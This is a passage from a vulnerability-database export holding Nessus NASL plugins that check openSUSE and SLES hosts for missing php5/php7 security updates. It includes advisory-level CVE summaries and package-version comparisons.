sp:\"0\", reference:\"php5-wddx-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-debuginfo-5.5.14-109.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:31", "description": "This update for php7 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return fake host. (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU consumption denial of service attack by injectinglong form variables, related to main/php_variables.\n (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code did not check the return value of the OpenSSL sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code could lead to information leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by attackers supplying malicious archive files to crash the PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in zend_ini_do_op() could lead to denial of service (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data in gdImageCreateFromGifCtx function could lead to denial of service (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader() resulting in heap overflow could lead to denial of service or code execution (bsc#986386)\n\nOther fixes :\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require php7-pear-Archive_Tar otherwise this dependency must be declared in every php7-pear-* package explicitly.\n [bnc#1052389]\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {}, "published": "2017-09-05T00:00:00", "type": "nessus", "title": "openSUSE Security Update : php7 (openSUSE-2017-994)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10397", "CVE-2016-5766", "CVE-2017-11142", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11146", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-7890"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php7", "p-cpe:/a:novell:opensuse:apache2-mod_php7-debuginfo", "p-cpe:/a:novell:opensuse:php7", "p-cpe:/a:novell:opensuse:php7-bcmath", "p-cpe:/a:novell:opensuse:php7-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php7-bz2", "p-cpe:/a:novell:opensuse:php7-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php7-calendar", "p-cpe:/a:novell:opensuse:php7-mcrypt", "p-cpe:/a:novell:opensuse:php7-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php7-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php7-ctype", "p-cpe:/a:novell:opensuse:php7-mysql", "p-cpe:/a:novell:opensuse:php7-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php7-odbc", "p-cpe:/a:novell:opensuse:php7-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php7-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php7-opcache", "p-cpe:/a:novell:opensuse:php7-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php7-curl", "p-cpe:/a:novell:opensuse:php7-curl-debuginfo", "p-cpe:/a:novell:opensuse:php7-openssl", "p-cpe:/a:novell:opensuse:php7-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php7-dba", "p-cpe:/a:novell:opensuse:php7-pcntl", "p-cpe:/a:novell:opensuse:php7-dba-debuginfo", "p-cpe:/a:novell:opensuse:php7-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php7-pdo", "p-cpe:/a:novell:opensuse:php7-debuginfo", "p-cpe:/a:novell:opensuse:php7-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php7-pear", "p-cpe:/a:novell:opensuse:php7-debugsource", "p-cpe:/a:novell:opensuse:php7-pear-archive_tar", "p-cpe:/a:novell:opensuse:php7-devel", "p-cpe:/a:novell:opensuse:php7-pgsql", "p-cpe:/a:novell:opensuse:php7-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php7-dom", "p-cpe:/a:novell:opensuse:php7-phar", "p-cpe:/a:novell:opensuse:php7-dom-debuginfo", "p-cpe:/a:novell:opensuse:php7-phar-debuginfo", "p-cpe:/a:novell:opensuse:php7-posix", "p-cpe:/a:novell:opensuse:php7-posix-debuginfo", "p-cpe:/a:novell:opensuse:php7-pspell", "p-cpe:/a:novell:opensuse:php7-enchant", "p-cpe:/a:novell:opensuse:php7-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php7-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php7-readline", "p-cpe:/a:novell:opensuse:php7-exif", "p-cpe:/a:novell:opensuse:php7-readline-debuginfo", "p-cpe:/a:novell:opensuse:php7-exif-debuginfo", "p-cpe:/a:novell:opensuse:php7-shmop", "p-cpe:/a:novell:opensuse:php7-fastcgi", "p-cpe:/a:novell:opensuse:php7-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php7-snmp", "p-cpe:/a:novell:opensuse:php7-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php7-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php7-fileinfo", "p-cpe:/a:novell:opensuse:php7-soap", "p-cpe:/a:novell:opensuse:php7-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php7-soap-debuginfo", "p-cpe:/a:novell:opensuse:php7-firebird", "p-cpe:/a:novell:opensuse:php7-sockets", "p-cpe:/a:novell:opensuse:php7-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php7-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php7-sqlite", "p-cpe:/a:novell:opensuse:php7-fpm", "p-cpe:/a:novell:opensuse:php7-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvmsg", "p-cpe:/a:novell:opensuse:php7-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvsem", "p-cpe:/a:novell:opensuse:php7-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvshm", "p-cpe:/a:novell:opensuse:php7-ftp", "p-cpe:/a:novell:opensuse:php7-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php7-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php7-tidy", "p-cpe:/a:novell:opensuse:php7-gd", "p-cpe:/a:novell:opensuse:php7-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php7-tokenizer", "p-cpe:/a:novell:opensuse:php7-gd-debuginfo", "p-cpe:/a:novell:opensuse:php7-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php7-gettext", "p-cpe:/a:novell:opensuse:php7-wddx", "p-cpe:/a:novell:opensuse:php7-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php7-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php7-xmlreader", "p-cpe:/a:novell:opensuse:php7-gmp", "p-cpe:/a:novell:opensuse:php7-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php7-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php7-xmlrpc", "p-cpe:/a:novell:opensuse:php7-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php7-iconv", "p-cpe:/a:novell:opensuse:php7-xmlwriter", "p-cpe:/a:novell:opensuse:php7-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php7-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php7-xsl", "p-cpe:/a:novell:opensuse:php7-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php7-zip", "p-cpe:/a:novell:opensuse:php7-imap", "p-cpe:/a:novell:opensuse:php7-zip-debuginfo", "p-cpe:/a:novell:opensuse:php7-zlib", "p-cpe:/a:novell:opensuse:php7-imap-debuginfo", "p-cpe:/a:novell:opensuse:php7-intl", "p-cpe:/a:novell:opensuse:php7-zlib-debuginfo", "p-cpe:/a:novell:opensuse:php7-intl-debuginfo", "cpe:/o:novell:opensuse:42.2", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:php7-json", "p-cpe:/a:novell:opensuse:php7-json-debuginfo", "p-cpe:/a:novell:opensuse:php7-ldap", "p-cpe:/a:novell:opensuse:php7-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php7-mbstring", "p-cpe:/a:novell:opensuse:php7-mbstring-debuginfo"], "id": "OPENSUSE-2017-994.NASL", "href": "https://www.tenable.com/plugins/nessus/102947", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-994.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102947);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11142\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-7890\");\n\n script_name(english:\"openSUSE Security Update : php7 (openSUSE-2017-994)\");\n script_summary(english:\"Check for the openSUSE-2017-994 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php7 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU\n consumption denial of service attack by injectinglong\n form variables, related to main/php_variables.\n (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() could lead to denial of service\n (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data\n in gdImageCreateFromGifCtx function could lead to denial\n of service (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting in heap overflow could lead to denial of\n service or code execution (bsc#986386)\n\nOther fixes :\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require\n php7-pear-Archive_Tar otherwise this dependency must be\n declared in every php7-pear-* package explicitly.\n [bnc#1052389]\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1047454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1052389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1053645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986386\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php7 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pear-Archive_Tar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-mod_php7-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-mod_php7-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-bcmath-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-bcmath-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-bz2-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-bz2-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-calendar-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-calendar-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ctype-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ctype-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-curl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-curl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-dba-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-dba-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", 